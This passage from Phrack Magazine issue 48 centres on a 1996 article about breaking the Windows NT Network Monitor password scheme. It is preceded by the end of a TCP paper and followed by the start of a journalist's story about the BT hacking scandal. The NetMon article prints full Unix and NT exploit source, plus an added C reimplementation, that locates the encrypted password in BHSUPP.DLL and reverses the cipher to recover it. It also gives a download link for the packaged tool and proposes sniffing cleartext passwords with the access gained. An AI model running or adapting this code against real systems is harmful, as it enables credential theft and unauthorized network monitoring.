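Within one 4-tuple the hashed scheme still advances monotonically with M, so the stale-incarnation protection the paper attributes to the counter is kept; what changes is that a sample taken on one connection says nothing about the offset F gives another.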
[SECTION IV. SOURCES]


-Books: TCP/IP Illustrated vols. I, II & III

-RFCs: 793, 1825, 1948

-People: Richard W. Stevens, and the users of the
Information Nexus for proofreading

-Sourcecode: rbone, mendax, SYNflood


This paper made possible by a grant from the Guild Corporation.
==Phrack Magazine==


Volume Seven, Issue Forty-Eight, File 15 of 18


Windows NT Network Monitor Exploitation


NetMon Encryption Hammer


by the AON and Route
for Phrack Magazine
May 1996 Guild productions, kid


comments to daemon9@netcom.com


Full exploit including binary dll's and executables:
ftp.infonexus.com/pub/ToolsOfTheTrade/Windows/NT/netMonExploit.tgz


[The intro]


The Microsoft Network Monitor is a packet sniffer that runs under NT.
It is a very robust and versatile packet sniffer, offering much more than
simple ethernet frame capturing.  It packs a robust capture/display filter
language, powerful protocol parsers, and one snappy GUI.  NetMon is
delivered as part of the SMS package.  The user portion of the program
calls upon the services of the Network Monitor Agent, which is a kernel driver
that ships with NT (3.5.x for sure, but I don't know about 3.1).  The Network
Monitor Agent also provides an interface for a remote machine to connect and
capture local data, provided it passes authentication.  To restrict access,
Network Monitor Agent utilizes a password authentication scheme.  Access has
two tiers: privilege to view previously captured sessions, and privilege to
actually use the sniffer to place the ethernet card in promiscuous mode.  The
actual encrypted password is stored as a 32-byte binary string in a
dynamically linked library file called BHSUPP.DLL.  We have written code to
extract this password from the dll and decrypt it; we have broken the
Microsoft Network Monitor password authentication system.


[The low-down]


The encrypted string is kept as binary data in:
%SystemRoot%\system32\BHSUPP.DLL (in a default installation at least).
BHSUPP.DLL is known to be different sizes between versions, so we cannot look
for the encrypted string at a specific offset each time.  Instead we must
search for a flag, and seek 32 bytes past this flag.  The flag is the 16-byte
string: "RTSS&G--BEGIN--".  (As a matter of note, there is a terminating
footer also: "RTSS&G--END--".)


[The encrypted truth]


It is a simple encryption function, that takes a random-length string
and returns 256-bit encrypted output.  It may appear to be a hash, rather
than a block cipher, but it is not.  It does take a random-length input,
and produce a fixed output, but the input is always padded to 32 bytes
(with nulls if necessary).  The input to the function is a user defined
arbitrary string.  The input is truncated to 16 bytes and then to pad
out the array, the whole original password string is concatenated on the
truncated version, starting at the 16th byte.  It doesn't matter if the
resulting string is longer than 32 bytes, as the cipher ignores anything
past the 32nd byte.  So: "loveKillsTheDemon" becomes: "loveKillsTheDemo"
and then: "loveKillsTheDemoloveKillsTheDemon".  If your password is
smaller than 16 bytes, we get the 'hole-in-password' phenomenon.  Since
the array is initialized with nulls, and the password is still folded over to
the 16th byte, these nulls remain.  This is easily visible from the first line
of output in our exploit code.  It also accepts empty password strings
readily, without choking, which all Microsoft products seem willing to do all
too easily.
[The algorithm] 


The 32-byte string is put through 32 rounds of identical operations. 
The outer for loop controls the value of the byte to be XORed with the 
entire array that round (except for itself, see below). The inner loop steps 
through th ntire byte array. Each byte is permuted a total of 31 times 
(The discrepency comes from the test case where i must not be equal to j in 
order for a character to be permuted. It would make no sense to XOR a byte 
with itself). So, there are a total of 992 operations. The actual 
encryption algorithm is quite simple: 


        for (i = 0; i < 32; i++) 
            for (j = 0; j < 32; j++) 
                if (i != j) mix[j] ^= mix[i] + (i ^ j) + j; 


In English: if i is NOT equal to j, the j indexed char of mix is 
assigned the value of the j indexed char of mix XORed 
with the i indexed char of mix PLUS i XORed with j 
PLUS j. 

Mathematically:         Let's say  1) i ^ j = k 
                                   2) k + j = l 
                                   3) l + mix[i] = m 
                                   4) m ^ mix[j] = x 

                        OR 

                        mix[j] ^= mix[i] + (i ^ j) + j 


The methods used for obscurity are exclusive OR (XOR) and binary 
addition (see the appendix if you are unfamiliar with these bitwise 
operations) with completely known vectors. The only unknown in the whole 
equation is the user-entered password, fleshed out to 32 bytes. These 32 
bytes are taken through 32 rounds of permutations. Simple and concise, 
with no key material dropped, this algorithm is not lossy. Since it is not 
lossy it is 100% reversible, both in theory and practice. In fact, since we 
know the values of the counters i and j throughout the entire encryption 
process, decryption is simply a matter of reproducing these values in the 
proper order. Since the output of the encryption process is the input, 
taken through 32 rounds of identical permutations, with known vectors, 
we simply need to reverse this process. 
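The folding, the 32 rounds, their reversal and the flag search, as an added example in C written for this page (my own code, not the Guild's exploit; the nm_ function names, the NM_ constants and the constructed DLL image are assumptions, while the flag string and the 48-byte distance from the flag's 'R' to the token come from the article). It shows why the stored token is password-equivalent: nothing secret enters the transform, so whoever holds the token can run it backwards.

```c
#include <stdint.h>
#include <string.h>

#define NM_BLOCK 32                  /* the cipher state: 32 bytes, 32 rounds */
#define NM_FOLD  16                  /* password is cut at 16 bytes, then repeated */
#define NM_FLAG  "RTSS&G--BEGIN--"   /* marker from the article (15 chars + NUL) */
#define NM_TOKEN_OFFSET 48           /* 16-byte flag + 32 bytes, measured from its 'R' */

/* Fold a password into the working array as the article describes: the first
 * 16 bytes, then the password again from byte 16 on. Nulls fill what is left
 * (the "hole-in-password"); only 16 bytes of the second copy can matter,
 * because the cipher ignores everything past byte 32. */
void nm_fold(const char *password, uint8_t mix[NM_BLOCK])
{
    size_t len = strlen(password);
    size_t n = len < NM_FOLD ? len : NM_FOLD;
    memset(mix, 0, NM_BLOCK);
    memcpy(mix, password, n);
    memcpy(mix + NM_FOLD, password, n);
}

/* One of the 992 operations. The XOR mask depends on byte i and the two
 * public counters only, never on byte j itself. */
static void nm_step(uint8_t mix[NM_BLOCK], int i, int j)
{
    if (i != j)
        mix[j] ^= (uint8_t)(mix[i] + (i ^ j) + j);
}

/* 32 forward rounds. Byte i is the round's "key" and is never touched during
 * round i, which is exactly what makes the rounds undoable. */
void nm_swirl(uint8_t mix[NM_BLOCK])
{
    for (int i = 0; i < NM_BLOCK; i++)
        for (int j = 0; j < NM_BLOCK; j++)
            nm_step(mix, i, j);
}

/* The inverse: replay the same steps backwards. Each step XORs with a mask
 * that does not depend on the byte it changes, so each step undoes itself,
 * and reversing the round order restores every mix[i] to the value it had
 * when it served as the round key. No secret is involved anywhere. */
void nm_unswirl(uint8_t mix[NM_BLOCK])
{
    for (int i = NM_BLOCK - 1; i >= 0; i--)
        for (int j = NM_BLOCK - 1; j >= 0; j--)
            nm_step(mix, i, j);
}

/* Null bytes left inside the first 16 bytes after folding (the "hole"). */
int nm_hole_size(const char *password)
{
    uint8_t mix[NM_BLOCK];
    int holes = 0;
    nm_fold(password, mix);
    for (int k = 0; k < NM_FOLD; k++)
        holes += (mix[k] == 0);
    return holes;
}

/* Locate the token the way both exploit versions do: find the flag and take
 * the 32 bytes starting 48 bytes after its 'R'. Returns the token offset, or
 * -1 when the flag is absent or the token would run off the end of the buffer. */
long nm_find_token(const uint8_t *buf, size_t len)
{
    for (size_t k = 0; k + NM_TOKEN_OFFSET + NM_BLOCK <= len; k++)
        if (memcmp(buf + k, NM_FLAG, sizeof(NM_FLAG) - 1) == 0)
            return (long)(k + NM_TOKEN_OFFSET);
    return -1;
}

/* Constructed stand-in for BHSUPP.DLL (not a real DLL image): filler, the flag
 * at offset 10, and the swirled password 48 bytes later. Runs extraction and
 * reversal end to end; returns the recovered password or NULL if no flag. */
const char *nm_demo_recover(const char *password)
{
    static char out[NM_FOLD + 1];
    uint8_t image[128], token[NM_BLOCK];
    long at;
    memset(image, 0xAA, sizeof image);
    memcpy(image + 10, NM_FLAG, sizeof(NM_FLAG) - 1);
    nm_fold(password, token);
    nm_swirl(token);
    memcpy(image + 10 + NM_TOKEN_OFFSET, token, NM_BLOCK);

    at = nm_find_token(image, sizeof image);
    if (at < 0)
        return NULL;
    memcpy(token, image + at, NM_BLOCK);
    nm_unswirl(token);
    memset(out, 0, sizeof out);
    memcpy(out, token, NM_FOLD);        /* the first 16 bytes hold the password */
    return out;
}
```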


[The code] 


There are two versions of the exploit available: a Windows NT version 
and, for those of you without access to an expensive NT-native compiler, 
a Unix version as well. The NT version is a console-based app, as 
GUI code would be a waste of time. The full package of this exploit, along 
with an NT executable and sample DLLs, is available from: 
ftp.infonexus.com/pub/ToolsOfTheTrade/Windows/NT/netMonExploit.tgz 


[The discussion] 


The ramifications of this weak encryption in Network Monitor Agent are 
many. First off, the developers of Network Monitor Agent *didn't* use the 
standard security mechanisms of Windows NT. This may be because the driver is 
a kernel mode driver, and in NT the kernel is a trusted entity, therefore 
the standard (Win32) security API does not apply in the kernel, making it 
harder to do user authentication. It also appears that they were trying to 
achieve a mechanism based not on privilege, but on knowledge. It is very 
likely that in a secured environment not all administrators should be able to 
sniff the network. The problem is they did a *poor* job of securing a 
powerful utility. 

The most straightforward attack is to use Network Monitor to sniff the 
network (where you weren't supposed to be able to) for privileged user data or 
passwords in a heterogeneous environment (since native NT networking does not 
send password information in the clear, but standard TCP traffic from Unix 
is sent clear). The rest of the attacks would come from shabby administration, 
such as the administrator using the same password for the admin account and the 
capture password in Network Monitor Agent (stupid, but likely), or the 
same password for Network Monitor Agent on all machines across the network. 

In order to use the exploit utility, one must have read privilege for 
BHSUPP.DLL, which is installed into %SystemRoot%\system32 by default. This 
is not a remote attack, but rather a stepping stone to gain privileged 
information when one is under-privileged. 


[The moral] 


Time and time again we see either shoddy implementations of trusted 
algorithms, or, like in this case, just plain bad cryptography. Under ITAR, 
most secure cryptographic algorithms are classified as munitions, and are not 
exportable from this country. The funny thing is, under current law, one-way 
hashing functions are *not* restricted (that is why all Unix variants can ship 
with the standard crypt(3) libraries and executables). This authentication 
scheme could have *easily* been replaced by MD5, the same one-way hash used 
by PGP. At least then, the complexity of an attack would be increased to 
a brute-force known-plaintext sweep of key values... 


[The appendix] 


For the binary-declined... 


Exclusive OR 


The XOR operation is a bitwise operation with the following truth table: 


        XOR | 1 | 0 |        The Exclusive OR operation simply says: 
        ----+---+---+        "...Hmmm, if I have a 1 and a 0, I'll spit 
         1  | 0 | 1 |        out a 1. Anything else, a 0..." 
         0  | 1 | 0 | 


Binary addition 


Binary addition is analogous to base10 addition. However, each place holds 
2^n instead of 10^n... 

        add | 1  | 0 |       base10      base2 
        ----+----+---+         11         1011 
         1  | 10 | 1 |       +  5       + 0101 
         0  | 1  | 0 |         16        10000 

This exploit made possible by a grant from the Guild corporation. 
- May 07, 1996 route/aon 

[The Sourcecode] 

[Unix Version] 


/* 

        Network Monitor Exploitation code, Unix version 
        coded by daemon9 
        The Guild, 1996 

        made possible by a grant from the Guild corporation 

*/ 

#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <strings.h> 
#include <ctype.h> 
#include <fcntl.h> 
#include <unistd.h> 

#define fbufsize 8192 
#define flag "RTSS&G--BEGIN--" 
#define VERSION "Unix version\n" 
#define BUFSIZE 48 
#define DLLNAME "./BHSUPP.DLL" 

char *swirl(char *, int); 
char *recover(char *); 
void hexonx(char *); 
static char *readline(char *, int); 

int main(void) 
{ 
    char werd[] = "\n\n\n\n.this code made possible by a grant from the Guild corporation.\n"; 
    char *plain, *tmp, *fname, *encrypted; 

    printf("%s", werd); 
    printf("\nNetMon Password Decryption Engine "); 
    printf(VERSION); 
    printf("\t1.\t\tEncrypt a plaintext password from STDIN.\n"); 
    printf("\t2.\t\tDecrypt a plaintext password from the dll.\n"); 
    tmp = (char *)malloc(10); 
    bzero(tmp, 10); 
    switch (atoi(readline(tmp, 10))) { 
    case 1: 
        /* Can't switch getchar() as it locks the fucking stream and makes further I/O buggy */ 
        printf("Enter password to be encrypted (note echo is on, as it would be a moot point\nto turn it off)\n->"); 
        plain = (char *)malloc(BUFSIZE); 
        bzero(plain, BUFSIZE); 
        readline(plain, BUFSIZE); 
        hexonx(swirl(plain, 0)); 
        break; 
    case 2: 
        printf("Enter name and path of DLL [./BHSUPP.DLL]:"); 
        fname = (char *)malloc(BUFSIZE); 
        bzero(fname, BUFSIZE); 
        readline(fname, BUFSIZE); 
        if (fname[0] == 0) strcpy(fname, DLLNAME); 
        if (!(encrypted = recover(fname))) { 
            printf("Could not locate flag\n"); 
            exit(1); 
        } 
        hexonx(swirl(encrypted, 1)); 
        break; 
    default: 
        printf("\nFine.\n"); 
        exit(0); 
    } 
    return 0; 
} 

/* 
        readline reads one line from stdin and strips the newline. It stands in 
        for gets(), which modern C libraries no longer provide. 
*/ 
static char *readline(char *buf, int size) 
{ 
    if (fgets(buf, size, stdin) == NULL) buf[0] = 0; 
    buf[strcspn(buf, "\n")] = 0; 
    return buf; 
} 

/* 
        swirl is the encryption/decryption function. It takes an arbitrary length 
        string and, depending on the value of the mode variable, encrypts it or 
        decrypts it. It returns a pointer to the string. 
*/ 
char *swirl(char *byteStr, int mode) 
{ 
    int i = 0, j = 0; 
    char *mix, roundAndround[32][32]; 

    mix = (char *)malloc(33);                       /* 32 bytes of state plus a terminator */ 

    if (!mode) { 
        size_t len = strlen(byteStr); 
        memset(mix, 0, 33);                         /* set 32 bytes of memory to 0 */ 
        strncpy(mix, byteStr, 16);                  /* copy the first 16 bytes of the password into the mix */ 
        memcpy(&mix[16], byteStr, len < 16 ? len : 16); /* copy password into the 16th char of the mix; 
                                                       only 16 more bytes fit, the cipher ignores the rest */ 
        printf("Password upon entering encryption rounds:\n"); 
        hexonx(mix); 

        printf("\n\nbeginning 32 rounds of 'encryption'\n"); 
        for (i = 0; i < 32; i++) { 
            for (j = 0; j < 32; j++) 
                if (i != j) mix[j] ^= mix[i] + (i ^ j) + j;   /* Sekret Enkripsion occurs here */ 
            memcpy(&roundAndround[i][0], mix, 32);           /* save a copy of each round */ 
        } 
        printf("\nDo you wish to view the encryption process round by round?[y]"); 
        switch (toupper(getchar())) { 
        case 'N': 
            break; 
        case 'Y': 
        default: 
            for (i = 0; i < 32; i++) { 
                printf("round %d:\n", i + 1);       /* print the rounds out in hex */ 
                hexonx(&roundAndround[i][0]); 
                getc(stdin); 
            } 
        } 
        printf("\nEncrypted output:\n"); 
        return (mix); 
    } 

    memcpy(mix, byteStr, 32);                       /* the token may contain nulls, so no strncpy here */ 
    for (i = 31; i >= 0; i--) for (j = 31; j >= 0; j--) if (i != j) mix[j] ^= mix[i] + (i ^ j) + j; 
    mix[32] = 0; 
    printf("\n\n\nThe plaintext is: %s\nIn hex:\n", mix); 
    return (mix); 
} 

/* 
        hexonx simply prints out 32 bytes of hexidecimal characters. 
*/ 
void hexonx(char *byteStr) 
{ 
    int i = 0; 
    for (; i < 32; i++) printf("0x%x ", (unsigned char)byteStr[i]); 
    printf("\n"); 
} 

/* 
        recover attempts to read the encrypted string from the dll 
*/ 
char *recover(char *fname) 
{ 
    char buffer[fbufsize], *pass; 
    int fd, i, nread, demonFlag = 0, bufOffset = 0; 
    long base = 0, offset = 0;                      /* file offset of this buffer / of the flag */ 

    if ((fd = open(fname, O_RDONLY)) < 0) { 
        fprintf(stderr, "Cannot open %s\n", fname); 
        exit(1); 
    } 
    while ((nread = read(fd, buffer, fbufsize)) > 0) { 
        /* stop early enough that the flag and the 32-byte password 48 bytes 
           past its 'R' still lie inside this buffer */ 
        for (i = 0; i + 48 + 32 <= nread && !demonFlag; i++) { 
            if (memcmp(&buffer[i], flag, strlen(flag)) == 0) { 
                demonFlag++; 
                bufOffset = i; 
                offset = base + i; 
                printf("Encrypted Token Flag: '%s' located at offset 0x%lx\n", flag, offset); 
                /* Password is 32 bytes past end of header */ 
                printf("Encrypted password should be located at offset 0x%lx\n", offset + 48); 
            } 
        } 
        if (demonFlag) break; 
        base += nread; 
    } 
    close(fd); 

    if (!demonFlag) return (0); 

    pass = (char *)malloc(BUFSIZE); 
    bzero(pass, BUFSIZE); 
    memcpy(pass, &buffer[bufOffset + 48], 32); 

    printf("\nDo you wish to view the encrypted password?[y]"); 
    switch (toupper(getchar())) { 
    case 'N': 
        break; 
    case 'Y': 
    default: 
        hexonx(pass); 
        getc(stdin); 
    } 
    return (pass); 
} 

[The Sourcecode] 
[NT Version] 


// 
// A Guild Production 1996 
// Constructed by AON 
// 

#define STRICT 
#define MAX_FILE_SIZE 24576     //if BHSUPP.DLL grows, so must this 

#include <windows.h> 
#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 

void DecryptPassword(LPBYTE lpEncryptedPassword, LPSTR lpszPlaintextPassword); 
BOOL GetEncryptedPassword(HANDLE hTargetFile, LPBYTE lpEncryptedPassword); 
void GetTargetFileFromUser(HANDLE* phTargetFile, LPSTR lpszTargetFile); 

HANDLE g_hStdIn, g_hStdOut;     //global declaration of StandardIN and OUT 

// This is a console app. ReadFile and WriteFile used throughout so StdIN and StdOUT 
// can be redirected. 
int main(int argc, char* argv[]) 
{ 
    HANDLE hTargetFile; 
    BYTE lpEncryptedPassword[32]; 
    char lpszPlaintextPassword[17] = {0}; 
    char lpszOutputBuffer[MAX_PATH + 64];   //large enough for the longest path plus message 
    char lpszTargetFile[MAX_PATH] = {0}; 
    char lpszUsage[] = "\nUsage: NMCrack [path to BHSUPP.DLL including filename]\n"; 
    LPTSTR lpszSystemDirectory = NULL; 
    UINT nCount, nCount2; 

    //set global handles 
    g_hStdIn = GetStdHandle(STD_INPUT_HANDLE); 
    g_hStdOut = GetStdHandle(STD_OUTPUT_HANDLE); 

    //check for standard NT help switch 
    if (argc > 1 && argv[1][0] == '/' && argv[1][1] == '?') 
    { 
        //display usage info 
        WriteFile(g_hStdOut, lpszUsage, sizeof(lpszUsage), &nCount, NULL); 
        //exit with success 
        ExitProcess(0L); 
    } 

    //if path and file name not specified on commandline try system directory first, because 
    //BHSUPP.DLL is probably there 
    if (argc == 1) 
    { 
        //find out how long path is for mem alloc 
        nCount = GetSystemDirectory(lpszSystemDirectory, 0); 
        //do alloc of that size 
        lpszSystemDirectory = malloc(nCount); 
        if (lpszSystemDirectory == NULL) 
        { 
            WriteFile(g_hStdOut, "Memory Allocation Failure - Terminating\n", 
                      41, &nCount, NULL); 
            ExitProcess(1L); 
        } 
        //get system dir 
        GetSystemDirectory(lpszSystemDirectory, nCount); 
        //append file name to system directory 
        sprintf(lpszTargetFile, "%s\\bhsupp.dll", lpszSystemDirectory); 
        //release memory 
        free(lpszSystemDirectory); 
    } 
    else 
        //get the commandline input 
        strcpy(lpszTargetFile, argv[1]); 

    //try to open BHSUPP.DLL in the system dir or where the user instructed 
    hTargetFile = CreateFile(lpszTargetFile, GENERIC_READ, FILE_SHARE_READ | 
                             FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 
                             FILE_FLAG_SEQUENTIAL_SCAN, NULL); 
    //if not on the commandline or in the system dir ask user for path 
    if (hTargetFile == INVALID_HANDLE_VALUE && argc == 1) 
    { 
        GetTargetFileFromUser(&hTargetFile, lpszTargetFile); 
    } 
    //user gave bad path or they don't have read permission on the file 
    else if (hTargetFile == INVALID_HANDLE_VALUE) 
    { 
        //make error string because file open failed 
        nCount2 = sprintf(lpszOutputBuffer, "\nUnable to open %s\n", lpszTargetFile); 
        //write out 
        WriteFile(g_hStdOut, lpszOutputBuffer, nCount2, &nCount, NULL); 
        //exit with failure 
        ExitProcess(1L); 
    } 
    //retrieve the encrypted password from BHSUPP.DLL 
    if (!GetEncryptedPassword(hTargetFile, lpEncryptedPassword)) 
    { 
        WriteFile(g_hStdOut, "Unable to retrieve encrypted password\n", 
                  39, &nCount, NULL); 
        ExitProcess(1L); 
    } 
    //cleanup handle 
    CloseHandle(hTargetFile); 
    //do the decryption here 
    DecryptPassword(lpEncryptedPassword, lpszPlaintextPassword); 
    //prepare for and print out results 
    nCount2 = sprintf(lpszOutputBuffer, 
                      "\nThe Network Monitor Agent capture password is %s\n", 
                      lpszPlaintextPassword); 
    WriteFile(g_hStdOut, lpszOutputBuffer, nCount2, &nCount, NULL); 

    //close StandardIN and StandardOUT handles 
    CloseHandle(g_hStdIn); 
    CloseHandle(g_hStdOut); 

    //exit with success 
    ExitProcess(0L); 
    return 0; 
} 

//Ah yeah, here it is. 
void DecryptPassword(LPBYTE lpEncryptedPassword, LPSTR lpszPlaintextPassword) 
{ 
    register int outer, inner; 

    //go backwards through loops to undo XOR 
    for (outer = 31; outer >= 0; outer--) 
    { 
        for (inner = 31; inner >= 0; inner--) 
        { 
            if (outer != inner) 
            { 
                lpEncryptedPassword[inner] ^= lpEncryptedPassword[outer] + 
                                              (outer ^ inner) + inner; 
            } 
        } 
    } 

    //since the original password was folded to fill 32 bytes only copy the first 16 bytes 
    memcpy(lpszPlaintextPassword, lpEncryptedPassword, 16); 

    //zero terminate this baby just in case it is actually a 16 byte password (yeah, right!) 
    lpszPlaintextPassword[16] = 0; 
    return; 
} 

// get the path and file name for BHSUPP.DLL from the user in the case that it was 
// a custom install 
void GetTargetFileFromUser(HANDLE* phTargetFile, LPSTR lpszTargetFile) 
{ 
    char lpszPrompt[] = "\nFull path to BHSUPP.DLL including file name: "; 
    UINT nCount = 0; 

    WriteFile(g_hStdOut, lpszPrompt, sizeof(lpszPrompt), &nCount, NULL); 
    ReadFile(g_hStdIn, lpszTargetFile, MAX_PATH - 1, &nCount, NULL); 

    //I had to account for the CR + LF that ReadFile counts in the nCount return value, 
    //so I can zero terminate this string. 
    if (nCount >= 2) 
        lpszTargetFile[nCount - 2] = 0; 
    else 
        lpszTargetFile[nCount] = 0; 

    *phTargetFile = CreateFile(lpszTargetFile, GENERIC_READ, FILE_SHARE_READ | 
                               FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 
                               FILE_FLAG_SEQUENTIAL_SCAN, NULL); 

    //too lazy to make the error message report the actual path and file name tried 
    if (*phTargetFile == INVALID_HANDLE_VALUE) 
    { 
        WriteFile(g_hStdOut, "Unable to open BHSUPP.DLL\n", 
                  26, &nCount, NULL); 
        ExitProcess(1L); 
    } 
} 

// This function allocs one big buffer and reads the whole damn DLL into it. 
// There is a flag string that marks the start of the section that contains the 
// encrypted passwords (in the case that there is a display password too), so 
// we search for the first and last characters in the string. If we hit on a match 
// we check about 50% of the chars in the string for a match. This is a good 
// enough check based on looking at the data. I guess I could optimize memory usage 
// here too, but 24K is not very much these days, so fuck it. 
BOOL GetEncryptedPassword(HANDLE hTargetFile, LPBYTE lpEncryptedPassword) 
{ 
    LPBYTE lpSearchBuffer; 
    UINT nCount, i; 

    //do the big buffer alloc 
    lpSearchBuffer = malloc(MAX_FILE_SIZE); 
    if (lpSearchBuffer == NULL) 
    { 
        WriteFile(g_hStdOut, "Memory Allocation Failure - Terminating\n", 
                  41, &nCount, NULL); 
        ExitProcess(1L); 
    } 

    //read in the entire file. It is small enough that this takes trivial time to complete 
    ReadFile(hTargetFile, lpSearchBuffer, MAX_FILE_SIZE, &nCount, NULL); 

    //do search for RTSS&G--BEGIN--. When it is found move 48 bytes past the R and copy 
    //the encrypted password into the workspace (stop early enough that the 32 bytes 
    //48 past the R are still inside what was read) 
    for (i = 0; i + 48 + 32 <= nCount; i++) 
    { 
        if (lpSearchBuffer[i] == 'R' && lpSearchBuffer[i+14] == '-') 
        { 
            if (lpSearchBuffer[i+1] == 'T' && lpSearchBuffer[i+2] == 'S' && 
                lpSearchBuffer[i+3] == 'S' && lpSearchBuffer[i+4] == '&' && 
                lpSearchBuffer[i+8] == 'B') 
            { 
                //found password and copying it into the workspace 
                memcpy(lpEncryptedPassword, &lpSearchBuffer[i+48], 32); 
                //cleanup the mem alloc 
                free(lpSearchBuffer); 
                //return with success 
                return TRUE; 
            } 
        } 
    } 

    //cleanup 
    free(lpSearchBuffer); 

    //it failed to find the marker string 
    return FALSE; 
} 
==Phrack Magazine== 


Volume Seven, Issue Forty-Eight, File 16 of 18 


THE TRUTH, THE WHOLE TRUTH AND NOTHING BUT THE TRUTH - 
a story of the 'BT-Hacker' scandal. 


By Steve Fleming 


Sitting in a chilly university computer department in northern England 
was in itself exhilarating. The mid-February climate made it cold; my 
head was buzzing with voices chatting freely about gaining access to 
secret computers, acquiring free telephone calls and how to fashion 
‘bombs’ to maim or kill lecturers and ’Senior Vice Principles’. There 
was nobody else in the room, all the company was just under a meter from 
me in CyberSpace, that alternative universe where anything is possible 
and everyone is somebody they want to be. The stories were 
extraordinary - in fact they were incredible, an eclectic mix of fact 
and fantasy bound together by expert social engineering. 


These CyberSpace 'cafes' are the BBS' - Bulletin Board Services - and 
are the stock-in-trade of the electronic community. The Internet is 
connected to some of them, but the best ones, the ones with the best 
chat and the most exciting files are not - you get the dial-in number 
from another user, and have to then beg to use the service. It is 
interesting to note that the Internet has now become a generic term for 
on-line communication and suffers as a result of its inappropriate use. 
Blaming the Internet for anything is like apportioning culpability to 
'society' - fine for academics but otherwise a shallow construct. 


I have known some computer experts in my time, and still some 'reformed 
hackers' count as my best friends - I really wanted to find out if a 
major British computer could be hacked or if it had been done. The UK 
has some of the most draconian secrecy laws anywhere on the planet, so 
if secrets are found, they tend to be kept secret. When people start 
talking in CyberSpace, they really talk and talk and talk. Their voice 
has no tone or volume, no emotion or mood - it can be like talking with 
a form of electronic psychopath sometimes. But there are inventive 
ideas 'on-line', and sometimes you can SHOUT, but this is quite rude, 
mostly pictorial punctuation (the smiley) is the key. You can indicate 
a smile :-) or a frown {:-( and you can even indicate sarcasm ;-) with 
a sly wink. It's interesting to note that irony is not really a north 
American thing at all; sarcasm is a CyberSpace thing. I wouldn't say 
that I am an expert, I wouldn't even say that I was very good with 
computers, I'm always learning. My qualifications are in science; 
Biology and Psychology, not computing. What this gives me is an urge to 
investigate assuming a null hypothesis - I disprove things in short. 
It's funny to think that most of the press followed a placed PR line 
that I must be a '...twisted computer boffin who had broken into an 
"...entirely robust..." computer system'. And my, did that title stick 
- friends from Hong Kong to Turkey called to say I was a computer expert 
all over the world! This was very effective and obviously placed by 
someone with powerful influence, perhaps advertising influence? It 
doesn't really matter, bad journalism is all over and we all have a 
living to earn - I however, would never do it at the expense of a 
colleague. 


There was the vision of news editors screaming, "... get me some 
secrets!" They simply couldn't believe that a freelance with only a 
few published pieces could have brought in such an impressive story with 
a scandal at every level, so they capitulated with the 'boffin' lie and 
went back to boring, standard, sloppy 'background' on this 'hacker'. It 
was actually a bit of a personal tragedy, my on-line persona was 
cracked, there wasn't very much in my life at all, quite a boring person 
really; like most journalists who spend a lot of time observing rather 
than doing. The Today newspaper had some hot tip-offs from people I'd 
interviewed in the past, one man in particular who had lied in a silky 
and attractive way for two and a half hours had been doing the same to 
them. The fact that I wrote for a 'gay magazine'. Shock horror, a 
definite Philby, Burgess & McLean story breaking. What a bit of 
investigative journalism that wasn't, I wrote under my own name! Was he a 
spy, was he working for Libya, Israel, MI-6, MI-5, the Labour Party, 
Duncan Campbell, Richard Gott... and then there was the 'shit-bagging'. 
This happens when tardy investigators are ignorant of the facts, 
automatically they assume it should be them who had the story, if only 
they'd had the time. But this is all history now, and I forgive them 
all... but I never forget. 




How could a temporary member of staff see all this secret information? 
The list forming in the mind of the press (and I do think in situations 
like these one surprisingly tiny mind) went something like this: 


1. They aren't secrets at all. 


2. BT would know if anyone had looked at the secret stuff, so 
they'll catch the whistle-blower; probably working for computer 
security within BT. 


3. Fleming is a computer expert, he's hacked the system and is 
spinning a story to prevent him being found out - and he's not a 
'real' journalist and we are. 


Well, there was clear evidence that the stuff was very sensitive, so 
strike number 1 from the list. How could they wait for stage two, if it 
is the case it may take days or weeks, so they couldn’t have that - 
anyway the Independent had shown it could be done away in time or place 
of Fleming. The only option was; who’s there, who’1ll talk, and how can 
we retain credibility as journalists - repudiate the freelance! 


There was no shortage of shit-bag material; 'various anonymous 
sources... unconfirmed reports... it seems likely etc.' Some even 
fancied the idea that the details were shocking, but let's just do it all 
ourselves and dump on Fleming from a great height? It really was like 
being on a maggot farm, wading through pen after pen of repulsive, 
brainless, panicked... maggots. 


The truth is that there was no great skill involved in cracking BT's 
computer, it was so easy my pet parrot could have done it with only one 
claw. Many companies are confused about computer security and what it 
means. The sharp young suits talk about 'magneto-optical storage 
facilities' and 'EPROM or WORM access'. The captains of industry nod 
sagely, they run the ship and leave the deck scrubbing to junior 
officers. These proud, self-important and generally thick as two short 
planks when it comes to computers men, authorise huge budgets for the 
whiz-kids who play with the money, buy new things, install new software, 
'patch' the operating system, attach ISDN cards, issue user IDs after 
extensive family checks. You name it, and these guys do it, and they 
love it. They install password checkers that look for hackers (or 
errors) and disconnect users for 15 minutes if they get their passwords 
wrong three times. The captains of industry still discuss 'wireless' 
and 'word processors'. The bright young men should be allowed to deal 
with all the computer stuff, it's not that the captains can't understand 
it or anything like that, they just don't have the time. 


Staff who have to work the systems couldn’t care less about the 
‘advanced software engineering’ that went into the system. There is as 
much ’social engineering’ as any other sort when it comes to computers 
for industry. So they have to remember passwords that change regularly 
and they have to remember to get that report done, and see the boss and 
train the new staff and type that letter and claim those expenses and 
design that form and... it’s a lot to remember. When folk have a lot to 
remember they make lists, and those lists include passwords - sounds 
like an opportunity for 'trashing'. They simply look through the 
rubbish and see what they can see. Sometimes someone writes down a 
password on a post-it note to let someone into their computer for some 
reason, that person enters the password and makes a note in their diary 
of it and pops the sticky in the bin. Then, in these busy offices, 
staffing levels are being cut. The managers need a dozen staff, and 
have four. They are allowed to contract from a temp agency and top up 
the office. These people are often unemployed graduates. Clever, but 
very, very bored. They don’t get paid much, 4.00 an hour. That’s what 
I was paid to write a nationwide database suite for BT but there I have 
to stop, the gag is cutting into me. They just want a decent job, and 
try to impress in case they get offered one, and the companies play on 
this and exploit without mercy. 4.00 an hour and they want unbridled 
enthusiasm, ideas, loyalty, commitment - who are they trying to kid! 


The computer administrators say they can’t give temporary access to the 
system, '... it can't be done.' Well what do you suggest? 'You'll just 
have to make do, it’s the system, can’t help, sorry.’ You need a dozen 
workers, perhaps 6 need to be on the system, you have 5 passwords plus 
another of the departmental manager making six. Why not let the temps 
use these passwords and you can get on with the more important stuff, 
can’t be any harm in that? It’s not as if we’re using them? However, 
temps are just that, temporary - they move on. Consequently with all 
the changes you make up a folder with all the passwords and then they 
can just flick through that to find a password, it doesn’t seem all that 
